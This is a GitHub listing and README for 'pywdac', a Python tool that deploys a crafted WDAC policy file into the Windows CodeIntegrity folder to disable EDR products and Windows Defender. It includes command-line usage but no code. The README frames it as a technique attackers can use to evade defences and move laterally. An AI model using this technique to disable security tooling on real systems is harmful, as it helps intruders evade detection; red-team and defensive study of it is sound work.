https://github.com/psycore8/pywdac
Kills EDR with Windows Defender Application Control
https://github.com/psycore8/pywdac
Last synced: about 1 year ago
JSON representation
Kills EDR with Windows Defender Application Control
- Host: GitHub
- URL: https://github.com/psycore8/pywdac
- Owner: psycore8
- License: gpl-3.0
- Created: 2025-01-07T11:16:20.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2025-01-31T09:25:02.000Z (over 1 year ago)
- Last Synced: 2025-02-09T02:18:34.410Z (over 1 year ago)
- Language: Python
- Size: 17.6 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# pywdac
> Kills EDR with Windows Defender Application Control
Windows Defender Application Control (WDAC) is a policy-based application control system. Programs and directories can be allowed or blocked.
However, specially configured policies can be used to disable EDRs. Even the built-in Windows Defender can be bypassed this way.
With sufficient administrative privileges, attackers can exploit this to move laterally within the network.
## pywdac features
pywdac checks for write permission in the CodeIntegrity directory. If granted, a copy of the file SiPolicy.p7b is created there.
Additionally, the tool supports the following:
- Conversion of an XML template into the binary policy format
- Restarting the Computer
- Deleting the policy file from the directory
## usage
```shell
usage: pywdac.py [-h] [-d DIRECTORY] [-r] [-u] [-x XML_TEMPLATE]
options:
-h, --help show this help message and exit
-d, --directory DIRECTORY
Path to CodeIntegrity folder, where SiPolicy.p7b should be deployed
-r, --reboot Optional reboot after deployment, delayed for 60 seconds
-u, --undo Deletes SiPolicy.p7b from CodeIntegrity folder
-x, --xml-template XML_TEMPLATE
This will convert an XML policy template into SiPolicy.p7b
```